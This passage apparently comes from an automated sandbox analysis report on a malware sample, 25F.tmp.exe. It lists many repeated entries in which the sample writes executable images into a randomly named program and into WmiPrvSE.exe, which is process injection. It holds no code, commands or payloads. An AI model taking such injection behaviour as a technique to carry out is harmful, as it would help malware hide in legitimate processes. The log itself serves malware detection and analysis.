            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
